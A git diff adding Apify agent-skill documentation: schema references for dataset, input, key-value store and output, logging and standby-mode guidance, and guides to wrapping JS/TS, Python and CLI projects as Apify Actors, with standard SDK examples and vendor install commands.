+ - `generatedBy` (string) - Tool and model name that generated/modified the actor (e.g., "Claude Code with Claude Sonnet 4.5")
+- `input` (string, optional) - Path to input schema file
+- `output` (string, optional) - Path to output schema file
+- `storages` (object, optional) - Storage schema references
+ - `dataset` (string) - Path to dataset schema file
+ - `keyValueStore` (string) - Path to key-value store schema file
+- `dockerfile` (string, optional) - Path to Dockerfile
+
+**Important:** Always fill in the `generatedBy` property with the tool and model you're currently using (e.g., "Claude Code with Claude Sonnet 4.5") to help Apify improve documentation.
diff --git a/web-app/public/skills/apify-actor-development/references/dataset-schema.md b/web-app/public/skills/apify-actor-development/references/dataset-schema.md
new file mode 100644
index 00000000..c61a8cea
--- /dev/null
+++ b/web-app/public/skills/apify-actor-development/references/dataset-schema.md
@@ -0,0 +1,209 @@
+# Dataset Schema Reference
+
+The dataset schema defines how your Actor's output data is structured, transformed, and displayed in the Output tab in the Apify Console.
+
+## Examples
+
+### JavaScript and TypeScript
+
+Consider an example Actor that calls `Actor.pushData()` to store data into dataset:
+
+```javascript
+import { Actor } from 'apify';
+// Initialize the JavaScript SDK
+await Actor.init();
+
+/**
+ * Actor code
+ */
+await Actor.pushData({
+ numericField: 10,
+ pictureUrl: 'https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png',
+ linkUrl: 'https://google.com',
+ textField: 'Google',
+ booleanField: true,
+ dateField: new Date(),
+ arrayField: ['#hello', '#world'],
+ objectField: {},
+});
+
+// Exit successfully
+await Actor.exit();
+```
+
+### Python
+
+Consider an example Actor that calls `Actor.push_data()` to store data into dataset:
+
+```python
+# Dataset push example (Python)
+import asyncio
+from datetime import datetime
+from apify import Actor
+
+async def main():
+ await Actor.init()
+
+ # Actor code
+ await Actor.push_data({
+ 'numericField': 10,
+ 'pictureUrl': 'https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png',
+ 'linkUrl': 'https://google.com',
+ 'textField': 'Google',
+ 'booleanField': True,
+ 'dateField': datetime.now().isoformat(),
+ 'arrayField': ['#hello', '#world'],
+ 'objectField': {},
+ })
+
+ # Exit successfully
+ await Actor.exit()
+
+if __name__ == '__main__':
+ asyncio.run(main())
+```
+
+## Configuration
+
+To set up the Actor's output tab UI, reference a dataset schema file in `.actor/actor.json`:
+
+```json
+{
+ "actorSpecification": 1,
+ "name": "book-library-scraper",
+ "title": "Book Library Scraper",
+ "version": "1.0.0",
+ "storages": {
+ "dataset": "./dataset_schema.json"
+ }
+}
+```
+
+Then create the dataset schema in `.actor/dataset_schema.json`:
+
+```json
+{
+ "actorSpecification": 1,
+ "fields": {},
+ "views": {
+ "overview": {
+ "title": "Overview",
+ "transformation": {
+ "fields": [
+ "pictureUrl",
+ "linkUrl",
+ "textField",
+ "booleanField",
+ "arrayField",
+ "objectField",
+ "dateField",
+ "numericField"
+ ]
+ },
+ "display": {
+ "component": "table",
+ "properties": {
+ "pictureUrl": {
+ "label": "Image",
+ "format": "image"
+ },
+ "linkUrl": {
+ "label": "Link",
+ "format": "link"
+ },
+ "textField": {
+ "label": "Text",
+ "format": "text"
+ },
+ "booleanField": {
+ "label": "Boolean",
+ "format": "boolean"
+ },
+ "arrayField": {
+ "label": "Array",
+ "format": "array"
+ },
+ "objectField": {
+ "label": "Object",
+ "format": "object"
+ },
+ "dateField": {
+ "label": "Date",
+ "format": "date"
+ },
+ "numericField": {
+ "label": "Number",
+ "format": "number"
+ }
+ }
+ }
+ }
+ }
+}
+```
+
+## Structure
+
+```json
+{
+ "actorSpecification": 1,
+ "fields": {},
+ "views": {
+ "": {
+ "title": "string (required)",
+ "description": "string (optional)",
+ "transformation": {
+ "fields": ["string (required)"],
+ "unwind": ["string (optional)"],
+ "flatten": ["string (optional)"],
+ "omit": ["string (optional)"],
+ "limit": "integer (optional)",
+ "desc": "boolean (optional)"
+ },
+ "display": {
+ "component": "table (required)",
+ "properties": {
+ "": {
+ "label": "string (optional)",
+ "format": "text|number|date|link|boolean|image|array|object (optional)"
+ }
+ }
+ }
+ }
+ }
+}
+```
+
+## Properties
+
+### Dataset Schema Properties
+
+- `actorSpecification` (integer, required) - Specifies the version of dataset schema structure document (currently only version 1)
+- `fields` (JSONSchema object, required) - Schema of one dataset object (use JsonSchema Draft 2020-12 or compatible)
+- `views` (DatasetView object, required) - Object with API and UI views description
+
+### DatasetView Properties
+
+- `title` (string, required) - Visible in UI Output tab and API
+- `description` (string, optional) - Only available in API response
+- `transformation` (ViewTransformation object, required) - Data transformation applied when loading from Dataset API
+- `display` (ViewDisplay object, required) - Output tab UI visualization definition
+
+### ViewTransformation Properties
+
+- `fields` (string[], required) - Fields to present in output (order matches column order)
+- `unwind` (string[], optional) - Deconstructs nested children into parent object
+- `flatten` (string[], optional) - Transforms nested object into flat structure
+- `omit` (string[], optional) - Removes specified fields from output
+- `limit` (integer, optional) - Maximum number of results (default: all)
+- `desc` (boolean, optional) - Sort order (true = newest first)
+
+### ViewDisplay Properties
+
+- `component` (string, required) - Only `table` is available
+- `properties` (Object, optional) - Keys matching `transformation.fields` with ViewDisplayProperty values
+
+### ViewDisplayProperty Properties
+
+- `label` (string, optional) - Table column header
+- `format` (string, optional) - One of: `text`, `number`, `date`, `link`, `boolean`, `image`, `array`, `object`
diff --git a/web-app/public/skills/apify-actor-development/references/input-schema.md b/web-app/public/skills/apify-actor-development/references/input-schema.md
new file mode 100644
index 00000000..0acfeb07
--- /dev/null
+++ b/web-app/public/skills/apify-actor-development/references/input-schema.md
@@ -0,0 +1,66 @@
+# Input Schema Reference
+
+The input schema defines the input parameters for an Actor. It's a JSON object comprising various field types supported by the Apify platform.
+
+## Structure
+
+```json
+{
+ "title": "",
+ "type": "object",
+ "schemaVersion": 1,
+ "properties": {
+ /* define input fields here */
+ },
+ "required": []
+}
+```
+
+## Example
+
+```json
+{
+ "title": "E-commerce Product Scraper Input",
+ "type": "object",
+ "schemaVersion": 1,
+ "properties": {
+ "startUrls": {
+ "title": "Start URLs",
+ "type": "array",
+ "description": "URLs to start scraping from (category pages or product pages)",
+ "editor": "requestListSources",
+ "default": [{ "url": "https://example.com/category" }],
+ "prefill": [{ "url": "https://example.com/category" }]
+ },
+ "followVariants": {
+ "title": "Follow Product Variants",
+ "type": "boolean",
+ "description": "Whether to scrape product variants (different colors, sizes)",
+ "default": true
+ },
+ "maxRequestsPerCrawl": {
+ "title": "Max Requests per Crawl",
+ "type": "integer",
+ "description": "Maximum number of pages to scrape (0 = unlimited)",
+ "default": 1000,
+ "minimum": 0
+ },
+ "proxyConfiguration": {
+ "title": "Proxy Configuration",
+ "type": "object",
+ "description": "Proxy settings for anti-bot protection",
+ "editor": "proxy",
+ "default": { "useApifyProxy": false }
+ },
+ "locale": {
+ "title": "Locale",
+ "type": "string",
+ "description": "Language/country code for localized content",
+ "default": "cs",
+ "enum": ["cs", "en", "de", "sk"],
+ "enumTitles": ["Czech", "English", "German", "Slovak"]
+ }
+ },
+ "required": ["startUrls"]
+}
+```
diff --git a/web-app/public/skills/apify-actor-development/references/key-value-store-schema.md b/web-app/public/skills/apify-actor-development/references/key-value-store-schema.md
new file mode 100644
index 00000000..81b588f5
--- /dev/null
+++ b/web-app/public/skills/apify-actor-development/references/key-value-store-schema.md
@@ -0,0 +1,129 @@
+# Key-Value Store Schema Reference
+
+The key-value store schema organizes keys into logical groups called collections for easier data management.
+
+## Examples
+
+### JavaScript and TypeScript
+
+Consider an example Actor that calls `Actor.setValue()` to save records into the key-value store:
+
+```javascript
+import { Actor } from 'apify';
+// Initialize the JavaScript SDK
+await Actor.init();
+
+/**
+ * Actor code
+ */
+await Actor.setValue('document-1', 'my text data', { contentType: 'text/plain' });
+
+await Actor.setValue(`image-${imageID}`, imageBuffer, { contentType: 'image/jpeg' });
+
+// Exit successfully
+await Actor.exit();
+```
+
+### Python
+
+Consider an example Actor that calls `Actor.set_value()` to save records into the key-value store:
+
+```python
+# Key-Value Store set example (Python)
+import asyncio
+from apify import Actor
+
+async def main():
+ await Actor.init()
+
+ # Actor code
+ await Actor.set_value('document-1', 'my text data', content_type='text/plain')
+
+ image_id = '123' # example placeholder
+ image_buffer = b'...' # bytes buffer with image data
+ await Actor.set_value(f'image-{image_id}', image_buffer, content_type='image/jpeg')
+
+ # Exit successfully
+ await Actor.exit()
+
+if __name__ == '__main__':
+ asyncio.run(main())
+```
+
+## Configuration
+
+To configure the key-value store schema, reference a schema file in `.actor/actor.json`:
+
+```json
+{
+ "actorSpecification": 1,
+ "name": "data-collector",
+ "title": "Data Collector",
+ "version": "1.0.0",
+ "storages": {
+ "keyValueStore": "./key_value_store_schema.json"
+ }
+}
+```
+
+Then create the key-value store schema in `.actor/key_value_store_schema.json`:
+
+```json
+{
+ "actorKeyValueStoreSchemaVersion": 1,
+ "title": "Key-Value Store Schema",
+ "collections": {
+ "documents": {
+ "title": "Documents",
+ "description": "Text documents stored by the Actor",
+ "keyPrefix": "document-"
+ },
+ "images": {
+ "title": "Images",
+ "description": "Images stored by the Actor",
+ "keyPrefix": "image-",
+ "contentTypes": ["image/jpeg"]
+ }
+ }
+}
+```
+
+## Structure
+
+```json
+{
+ "actorKeyValueStoreSchemaVersion": 1,
+ "title": "string (required)",
+ "description": "string (optional)",
+ "collections": {
+ "": {
+ "title": "string (required)",
+ "description": "string (optional)",
+ "key": "string (conditional - use key OR keyPrefix)",
+ "keyPrefix": "string (conditional - use key OR keyPrefix)",
+ "contentTypes": ["string (optional)"],
+ "jsonSchema": "object (optional)"
+ }
+ }
+}
+```
+
+## Properties
+
+### Key-Value Store Schema Properties
+
+- `actorKeyValueStoreSchemaVersion` (integer, required) - Version of key-value store schema structure document (currently only version 1)
+- `title` (string, required) - Title of the schema
+- `description` (string, optional) - Description of the schema
+- `collections` (Object, required) - Object where each key is a collection ID and value is a Collection object
+
+### Collection Properties
+
+- `title` (string, required) - Collection title shown in UI tabs
+- `description` (string, optional) - Description appearing in UI tooltips
+- `key` (string, conditional) - Single specific key for this collection
+- `keyPrefix` (string, conditional) - Prefix for keys included in this collection
+- `contentTypes` (string[], optional) - Allowed content types for validation
+- `jsonSchema` (object, optional) - JSON Schema Draft 07 format for `application/json` content type validation
+
+Either `key` or `keyPrefix` must be specified for each collection, but not both.
diff --git a/web-app/public/skills/apify-actor-development/references/logging.md b/web-app/public/skills/apify-actor-development/references/logging.md
new file mode 100644
index 00000000..cc39bf3a
--- /dev/null
+++ b/web-app/public/skills/apify-actor-development/references/logging.md
@@ -0,0 +1,50 @@
+# Actor Logging Reference
+
+## JavaScript and TypeScript
+
+**ALWAYS use the `apify/log` package for logging** - This package contains critical security logic including censoring sensitive data (Apify tokens, API keys, credentials) to prevent accidental exposure in logs.
+
+### Available Log Levels in `apify/log`
+
+The Apify log package provides the following methods for logging:
+
+- `log.debug()` - Debug level logs (detailed diagnostic information)
+- `log.info()` - Info level logs (general informational messages)
+- `log.warning()` - Warning level logs (warning messages for potentially problematic situations)
+- `log.warningOnce()` - Warning level logs (same warning message logged only once)
+- `log.error()` - Error level logs (error messages for failures)
+- `log.exception()` - Exception level logs (for exceptions with stack traces)
+- `log.perf()` - Performance level logs (performance metrics and timing information)
+- `log.deprecated()` - Deprecation level logs (warnings about deprecated code)
+- `log.softFail()` - Soft failure logs (non-critical failures that don't stop execution, e.g., input validation errors, skipped items)
+- `log.internal()` - Internal level logs (internal/system messages)
+
+### Best Practices
+
+- Use `log.debug()` for detailed operation-level diagnostics (inside functions)
+- Use `log.info()` for general informational messages (API requests, successful operations)
+- Use `log.warning()` for potentially problematic situations (validation failures, unexpected states)
+- Use `log.error()` for actual errors and failures
+- Use `log.exception()` for caught exceptions with stack traces
+
+## Python
+
+**ALWAYS use `Actor.log` for logging** - This logger contains critical security logic including censoring sensitive data (Apify tokens, API keys, credentials) to prevent accidental exposure in logs.
+
+### Available Log Levels
+
+The Apify Actor logger provides the following methods for logging:
+
+- `Actor.log.debug()` - Debug level logs (detailed diagnostic information)
+- `Actor.log.info()` - Info level logs (general informational messages)
+- `Actor.log.warning()` - Warning level logs (warning messages for potentially problematic situations)
+- `Actor.log.error()` - Error level logs (error messages for failures)
+- `Actor.log.exception()` - Exception level logs (for exceptions with stack traces)
+
+### Best Practices
+
+- Use `Actor.log.debug()` for detailed operation-level diagnostics (inside functions)
+- Use `Actor.log.info()` for general informational messages (API requests, successful operations)
+- Use `Actor.log.warning()` for potentially problematic situations (validation failures, unexpected states)
+- Use `Actor.log.error()` for actual errors and failures
+- Use `Actor.log.exception()` for caught exceptions with stack traces
diff --git a/web-app/public/skills/apify-actor-development/references/output-schema.md b/web-app/public/skills/apify-actor-development/references/output-schema.md
new file mode 100644
index 00000000..89e439ca
--- /dev/null
+++ b/web-app/public/skills/apify-actor-development/references/output-schema.md
@@ -0,0 +1,49 @@
+# Output Schema Reference
+
+The Actor output schema builds upon the schemas for the dataset and key-value store. It specifies where an Actor stores its output and defines templates for accessing that output. Apify Console uses these output definitions to display run results.
+
+## Structure
+
+```json
+{
+ "actorOutputSchemaVersion": 1,
+ "title": "",
+ "properties": {
+ /* define your outputs here */
+ }
+}
+```
+
+## Example
+
+```json
+{
+ "actorOutputSchemaVersion": 1,
+ "title": "Output schema of the files scraper",
+ "properties": {
+ "files": {
+ "type": "string",
+ "title": "Files",
+ "template": "{{links.apiDefaultKeyValueStoreUrl}}/keys"
+ },
+ "dataset": {
+ "type": "string",
+ "title": "Dataset",
+ "template": "{{links.apiDefaultDatasetUrl}}/items"
+ }
+ }
+}
+```
+
+## Output Schema Template Variables
+
+- `links` (object) - Contains quick links to most commonly used URLs
+- `links.publicRunUrl` (string) - Public run url in format `https://console.apify.com/view/runs/:runId`
+- `links.consoleRunUrl` (string) - Console run url in format `https://console.apify.com/actors/runs/:runId`
+- `links.apiRunUrl` (string) - API run url in format `https://api.apify.com/v2/actor-runs/:runId`
+- `links.apiDefaultDatasetUrl` (string) - API url of default dataset in format `https://api.apify.com/v2/datasets/:defaultDatasetId`
+- `links.apiDefaultKeyValueStoreUrl` (string) - API url of default key-value store in format `https://api.apify.com/v2/key-value-stores/:defaultKeyValueStoreId`
+- `links.containerRunUrl` (string) - URL of a webserver running inside the run in format `https://.runs.apify.net/`
+- `run` (object) - Contains information about the run same as it is returned from the `GET Run` API endpoint
+- `run.defaultDatasetId` (string) - ID of the default dataset
+- `run.defaultKeyValueStoreId` (string) - ID of the default key-value store
diff --git a/web-app/public/skills/apify-actor-development/references/standby-mode.md b/web-app/public/skills/apify-actor-development/references/standby-mode.md
new file mode 100644
index 00000000..73d60252
--- /dev/null
+++ b/web-app/public/skills/apify-actor-development/references/standby-mode.md
@@ -0,0 +1,61 @@
+# Actor Standby Mode Reference
+
+## JavaScript and TypeScript
+
+- **NEVER disable standby mode (`usesStandbyMode: false`) in `.actor/actor.json` without explicit permission** - Actor Standby mode solves this problem by letting you have the Actor ready in the background, waiting for the incoming HTTP requests. In a sense, the Actor behaves like a real-time web server or standard API server instead of running the logic once to process everything in batch. Always keep `usesStandbyMode: true` unless there is a specific documented reason to disable it
+- **ALWAYS implement readiness probe handler for standby Actors** - Handle the `x-apify-container-server-readiness-probe` header at GET / endpoint to ensure proper Actor lifecycle management
+
+You can recognize a standby Actor by checking the `usesStandbyMode` property in `.actor/actor.json`. Only implement the readiness probe if this property is set to `true`.
+
+### Readiness Probe Implementation Example
+
+```javascript
+// Apify standby readiness probe at root path
+app.get('/', (req, res) => {
+ res.writeHead(200, { 'Content-Type': 'text/plain' });
+ if (req.headers['x-apify-container-server-readiness-probe']) {
+ res.end('Readiness probe OK\n');
+ } else {
+ res.end('Actor is ready\n');
+ }
+});
+```
+
+Key points:
+
+- Detect the `x-apify-container-server-readiness-probe` header in incoming requests
+- Respond with HTTP 200 status code for both readiness probe and normal requests
+- This enables proper Actor lifecycle management in standby mode
+
+## Python
+
+- **NEVER disable standby mode (`usesStandbyMode: false`) in `.actor/actor.json` without explicit permission** - Actor Standby mode solves this problem by letting you have the Actor ready in the background, waiting for the incoming HTTP requests. In a sense, the Actor behaves like a real-time web server or standard API server instead of running the logic once to process everything in batch. Always keep `usesStandbyMode: true` unless there is a specific documented reason to disable it
+- **ALWAYS implement readiness probe handler for standby Actors** - Handle the `x-apify-container-server-readiness-probe` header at GET / endpoint to ensure proper Actor lifecycle management
+
+You can recognize a standby Actor by checking the `usesStandbyMode` property in `.actor/actor.json`. Only implement the readiness probe if this property is set to `true`.
+
+### Readiness Probe Implementation Example
+
+```python
+# Apify standby readiness probe
+from http.server import SimpleHTTPRequestHandler
+
+class GetHandler(SimpleHTTPRequestHandler):
+ def do_GET(self):
+ # Handle Apify standby readiness probe
+ if 'x-apify-container-server-readiness-probe' in self.headers:
+ self.send_response(200)
+ self.end_headers()
+ self.wfile.write(b'Readiness probe OK')
+ return
+
+ self.send_response(200)
+ self.end_headers()
+ self.wfile.write(b'Actor is ready')
+```
+
+Key points:
+
+- Detect the `x-apify-container-server-readiness-probe` header in incoming requests
+- Respond with HTTP 200 status code for both readiness probe and normal requests
+- This enables proper Actor lifecycle management in standby mode
diff --git a/web-app/public/skills/apify-actorization/SKILL.md b/web-app/public/skills/apify-actorization/SKILL.md
new file mode 100644
index 00000000..4f90b1d0
--- /dev/null
+++ b/web-app/public/skills/apify-actorization/SKILL.md
@@ -0,0 +1,184 @@
+---
+name: apify-actorization
+description: "Convert existing projects into Apify Actors - serverless cloud programs. Actorize JavaScript/TypeScript (SDK with Actor.init/exit), Python (async context manager), or any language (CLI wrapper). Us..."
+---
+
+# Apify Actorization
+
+Actorization converts existing software into reusable serverless applications compatible with the Apify platform. Actors are programs packaged as Docker images that accept well-defined JSON input, perform an action, and optionally produce structured JSON output.
+
+## Quick Start
+
+1. Run `apify init` in project root
+2. Wrap code with SDK lifecycle (see language-specific section below)
+3. Configure `.actor/input_schema.json`
+4. Test with `apify run --input '{"key": "value"}'`
+5. Deploy with `apify push`
+
+## When to Use This Skill
+
+- Converting an existing project to run on Apify platform
+- Adding Apify SDK integration to a project
+- Wrapping a CLI tool or script as an Actor
+- Migrating a Crawlee project to Apify
+
+## Prerequisites
+
+Verify `apify` CLI is installed:
+
+```bash
+apify --help
+```
+
+If not installed:
+
+```bash
+curl -fsSL https://apify.com/install-cli.sh | bash
+
+# Or (Mac): brew install apify-cli
+# Or (Windows): irm https://apify.com/install-cli.ps1 | iex
+# Or: npm install -g apify-cli
+```
+
+Verify CLI is logged in:
+
+```bash
+apify info # Should return your username
+```
+
+If not logged in, check if `APIFY_TOKEN` environment variable is defined. If not, ask the user to generate one at https://console.apify.com/settings/integrations, then:
+
+```bash
+apify login -t $APIFY_TOKEN
+```
+
+## Actorization Checklist
+
+Copy this checklist to track progress:
+
+- [ ] Step 1: Analyze project (language, entry point, inputs, outputs)
+- [ ] Step 2: Run `apify init` to create Actor structure
+- [ ] Step 3: Apply language-specific SDK integration
+- [ ] Step 4: Configure `.actor/input_schema.json`
+- [ ] Step 5: Configure `.actor/output_schema.json` (if applicable)
+- [ ] Step 6: Update `.actor/actor.json` metadata
+- [ ] Step 7: Test locally with `apify run`
+- [ ] Step 8: Deploy with `apify push`
+
+## Step 1: Analyze the Project
+
+Before making changes, understand the project:
+
+1. **Identify the language** - JavaScript/TypeScript, Python, or other
+2. **Find the entry point** - The main file that starts execution
+3. **Identify inputs** - Command-line arguments, environment variables, config files
+4. **Identify outputs** - Files, console output, API responses
+5. **Check for state** - Does it need to persist data between runs?
+
+## Step 2: Initialize Actor Structure
+
+Run in the project root:
+
+```bash
+apify init
+```
+
+This creates:
+- `.actor/actor.json` - Actor configuration and metadata
+- `.actor/input_schema.json` - Input definition for the Apify Console
+- `Dockerfile` (if not present) - Container image definition
+
+## Step 3: Apply Language-Specific Changes
+
+Choose based on your project's language:
+
+- **JavaScript/TypeScript**: See [js-ts-actorization.md](references/js-ts-actorization.md)
+- **Python**: See [python-actorization.md](references/python-actorization.md)
+- **Other Languages (CLI-based)**: See [cli-actorization.md](references/cli-actorization.md)
+
+### Quick Reference
+
+| Language | Install | Wrap Code |
+|----------|---------|-----------|
+| JS/TS | `npm install apify` | `await Actor.init()` ... `await Actor.exit()` |
+| Python | `pip install apify` | `async with Actor:` |
+| Other | Use CLI in wrapper script | `apify actor:get-input` / `apify actor:push-data` |
+
+## Steps 4-6: Configure Schemas
+
+See [schemas-and-output.md](references/schemas-and-output.md) for detailed configuration of:
+- Input schema (`.actor/input_schema.json`)
+- Output schema (`.actor/output_schema.json`)
+- Actor configuration (`.actor/actor.json`)
+- State management (request queues, key-value stores)
+
+Validate schemas against `@apify/json_schemas` npm package.
+
+## Step 7: Test Locally
+
+Run the actor with inline input (for JS/TS and Python actors):
+
+```bash
+apify run --input '{"startUrl": "https://example.com", "maxItems": 10}'
+```
+
+Or use an input file:
+
+```bash
+apify run --input-file ./test-input.json
+```
+
+**Important:** Always use `apify run`, not `npm start` or `python main.py`. The CLI sets up the proper environment and storage.
+
+## Step 8: Deploy
+
+```bash
+apify push
+```
+
+This uploads and builds your actor on the Apify platform.
+
+## Monetization (Optional)
+
+After deploying, you can monetize your actor in the Apify Store. The recommended model is **Pay Per Event (PPE)**:
+
+- Per result/item scraped
+- Per page processed
+- Per API call made
+
+Configure PPE in the Apify Console under Actor > Monetization. Charge for events in your code with `await Actor.charge('result')`.
+
+Other options: **Rental** (monthly subscription) or **Free** (open source).
+
+## Pre-Deployment Checklist
+
+- [ ] `.actor/actor.json` exists with correct name and description
+- [ ] `.actor/actor.json` validates against `@apify/json_schemas` (`actor.schema.json`)
+- [ ] `.actor/input_schema.json` defines all required inputs
+- [ ] `.actor/input_schema.json` validates against `@apify/json_schemas` (`input.schema.json`)
+- [ ] `.actor/output_schema.json` defines output structure (if applicable)
+- [ ] `.actor/output_schema.json` validates against `@apify/json_schemas` (`output.schema.json`)
+- [ ] `Dockerfile` is present and builds successfully
+- [ ] `Actor.init()` / `Actor.exit()` wraps main code (JS/TS)
+- [ ] `async with Actor:` wraps main code (Python)
+- [ ] Inputs are read via `Actor.getInput()` / `Actor.get_input()`
+- [ ] Outputs use `Actor.pushData()` or key-value store
+- [ ] `apify run` executes successfully with test input
+- [ ] `generatedBy` is set in actor.json meta section
+
+## Apify MCP Tools
+
+If MCP server is configured, use these tools for documentation:
+
+- `search-apify-docs` - Search documentation
+- `fetch-apify-docs` - Get full doc pages
+
+Otherwise, the MCP Server url: `https://mcp.apify.com/?tools=docs`.
+
+## Resources
+
+- [Actorization Academy](https://docs.apify.com/academy/actorization) - Comprehensive guide
+- [Apify SDK for JavaScript](https://docs.apify.com/sdk/js) - Full SDK reference
+- [Apify SDK for Python](https://docs.apify.com/sdk/python) - Full SDK reference
+- [Apify CLI Reference](https://docs.apify.com/cli) - CLI commands
+- [Actor Specification](https://raw.githubusercontent.com/apify/actor-whitepaper/refs/heads/master/README.md) - Complete specification
diff --git a/web-app/public/skills/apify-actorization/references/cli-actorization.md b/web-app/public/skills/apify-actorization/references/cli-actorization.md
new file mode 100644
index 00000000..73b4ca6b
--- /dev/null
+++ b/web-app/public/skills/apify-actorization/references/cli-actorization.md
@@ -0,0 +1,81 @@
+# CLI-Based Actorization
+
+For languages without an SDK (Go, Rust, Java, etc.), create a wrapper script that uses the Apify CLI.
+
+## Create Wrapper Script
+
+Create `start.sh` in project root:
+
+```bash
+#!/bin/bash
+set -e
+
+# Get input from Apify key-value store
+INPUT=$(apify actor:get-input)
+
+# Parse input values (adjust based on your input schema)
+MY_PARAM=$(echo "$INPUT" | jq -r '.myParam // "default"')
+
+# Run your application with the input
+./your-application --param "$MY_PARAM"
+
+# If your app writes to a file, push it to key-value store
+# apify actor:set-value OUTPUT --contentType application/json < output.json
+
+# Or push structured data to dataset
+# apify actor:push-data '{"result": "value"}'
+```
+
+## Update Dockerfile
+
+Reference the [cli-start template Dockerfile](https://github.com/apify/actor-templates/blob/master/templates/cli-start/Dockerfile) which includes the `ubi` utility for installing binaries from GitHub releases.
+
+```dockerfile
+FROM apify/actor-node:20
+
+# Install ubi for easy GitHub release installation
+RUN curl --silent --location \
+ https://raw.githubusercontent.com/houseabsolute/ubi/master/bootstrap/bootstrap-ubi.sh | sh
+
+# Install your CLI tool from GitHub releases (example)
+# RUN ubi --project your-org/your-tool --in /usr/local/bin
+
+# Or install apify-cli and jq manually
+RUN npm install -g apify-cli
+RUN apt-get update && apt-get install -y jq
+
+# Copy your application
+COPY . .
+
+# Build your application if needed
+# RUN ./build.sh
+
+# Make start script executable
+RUN chmod +x start.sh
+
+# Run the wrapper script
+CMD ["./start.sh"]
+```
+
+## Testing CLI-Based Actors
+
+For CLI-based actors (shell wrapper scripts), you may need to test the underlying application directly with mock input, as `apify run` requires a Node.js or Python entry point.
+
+Test your wrapper script locally:
+
+```bash
+# Set up mock input
+export INPUT='{"myParam": "test-value"}'
+
+# Run wrapper script
+./start.sh
+```
+
+## CLI Commands Reference
+
+| Command | Description |
+|---------|-------------|
+| `apify actor:get-input` | Get input JSON from key-value store |
+| `apify actor:set-value KEY` | Store value in key-value store |
+| `apify actor:push-data JSON` | Push data to dataset |
+| `apify actor:get-value KEY` | Retrieve value from key-value store |
diff --git a/web-app/public/skills/apify-actorization/references/js-ts-actorization.md b/web-app/public/skills/apify-actorization/references/js-ts-actorization.md
new file mode 100644
index 00000000..2b2c894d
--- /dev/null
+++ b/web-app/public/skills/apify-actorization/references/js-ts-actorization.md
@@ -0,0 +1,111 @@
+# JavaScript/TypeScript Actorization
+
+## Install the Apify SDK
+
+```bash
+npm install apify
+```
+
+## Wrap Main Code with Actor Lifecycle
+
+```javascript
+import { Actor } from 'apify';
+
+// Initialize connection to Apify platform
+await Actor.init();
+
+// ============================================
+// Your existing code goes here
+// ============================================
+
+// Example: Get input from Apify Console or API
+const input = await Actor.getInput();
+console.log('Input:', input);
+
+// Example: Your crawler or processing logic
+// const crawler = new PlaywrightCrawler({ ... });
+// await crawler.run([input.startUrl]);
+
+// Example: Push results to dataset
+// await Actor.pushData({ result: 'data' });
+
+// ============================================
+// End of your code
+// ============================================
+
+// Graceful shutdown
+await Actor.exit();
+```
+
+## Key Points
+
+- `Actor.init()` configures storage to use Apify API when running on platform
+- `Actor.exit()` handles graceful shutdown and cleanup
+- Both calls must be awaited
+- Local execution remains unchanged - the SDK automatically detects the environment
+
+## Crawlee Projects
+
+Crawlee projects require minimal changes - just wrap with Actor lifecycle:
+
+```javascript
+import { Actor } from 'apify';
+import { PlaywrightCrawler } from 'crawlee';
+
+await Actor.init();
+
+// Get and validate input
+const input = await Actor.getInput();
+const {
+ startUrl = 'https://example.com',
+ maxItems = 100,
+} = input ?? {};
+
+let itemCount = 0;
+
+const crawler = new PlaywrightCrawler({
+ requestHandler: async ({ page, request, pushData }) => {
+ if (itemCount >= maxItems) return;
+
+ const title = await page.title();
+ await pushData({ url: request.url, title });
+ itemCount++;
+ },
+});
+
+await crawler.run([startUrl]);
+
+await Actor.exit();
+```
+
+## Express/HTTP Servers
+
+For web servers, use standby mode in actor.json:
+
+```json
+{
+ "actorSpecification": 1,
+ "name": "my-api",
+ "usesStandbyMode": true
+}
+```
+
+Then implement readiness probe. See [standby-mode.md](../../apify-actor-development/references/standby-mode.md).
+
+## Batch Processing Scripts
+
+```javascript
+import { Actor } from 'apify';
+
+await Actor.init();
+
+const input = await Actor.getInput();
+const items = input.items || [];
+
+for (const item of items) {
+ const result = processItem(item);
+ await Actor.pushData(result);
+}
+
+await Actor.exit();
+```
diff --git a/web-app/public/skills/apify-actorization/references/python-actorization.md b/web-app/public/skills/apify-actorization/references/python-actorization.md
new file mode 100644
index 00000000..b536206d
--- /dev/null
+++ b/web-app/public/skills/apify-actorization/references/python-actorization.md
@@ -0,0 +1,95 @@
+# Python Actorization
+
+## Install the Apify SDK
+
+```bash
+pip install apify
+```
+
+## Wrap Main Function with Actor Context Manager
+
+```python
+import asyncio
+from apify import Actor
+
+async def main() -> None:
+ async with Actor:
+ # ============================================
+ # Your existing code goes here
+ # ============================================
+
+ # Example: Get input from Apify Console or API
+ actor_input = await Actor.get_input()
+ print(f'Input: {actor_input}')
+
+ # Example: Your crawler or processing logic
+ # crawler = PlaywrightCrawler(...)
+ # await crawler.run([actor_input.get('startUrl')])
+
+ # Example: Push results to dataset
+ # await Actor.push_data({'result': 'data'})
+
+ # ============================================
+ # End of your code
+ # ============================================
+
+if __name__ == '__main__':
+ asyncio.run(main())
+```
+
+## Key Points
+
+- `async with Actor:` handles both initialization and cleanup
+- Automatically manages platform event listeners and graceful shutdown
+- Local execution remains unchanged - the SDK automatically detects the environment
+
+## Crawlee Python Projects
+
+```python
+import asyncio
+from apify import Actor
+from crawlee.playwright_crawler import PlaywrightCrawler
+
+async def main() -> None:
+ async with Actor:
+ # Get and validate input
+ actor_input = await Actor.get_input() or {}
+ start_url = actor_input.get('startUrl', 'https://example.com')
+ max_items = actor_input.get('maxItems', 100)
+
+ item_count = 0
+
+ async def request_handler(context):
+ nonlocal item_count
+ if item_count >= max_items:
+ return
+
+ title = await context.page.title()
+ await context.push_data({'url': context.request.url, 'title': title})
+ item_count += 1
+
+ crawler = PlaywrightCrawler(request_handler=request_handler)
+ await crawler.run([start_url])
+
+if __name__ == '__main__':
+ asyncio.run(main())
+```
+
+## Batch Processing Scripts
+
+```python
+import asyncio
+from apify import Actor
+
+async def main() -> None:
+ async with Actor:
+ actor_input = await Actor.get_input() or {}
+ items = actor_input.get('items', [])
+
+ for item in items:
+ result = process_item(item)
+ await Actor.push_data(result)
+
+if __name__ == '__main__':
+ asyncio.run(main())
+```
diff --git a/web-app/public/skills/apify-actorization/references/schemas-and-output.md b/web-app/public/skills/apify-actorization/references/schemas-and-output.md
new file mode 100644
index 00000000..a8387681
--- /dev/null
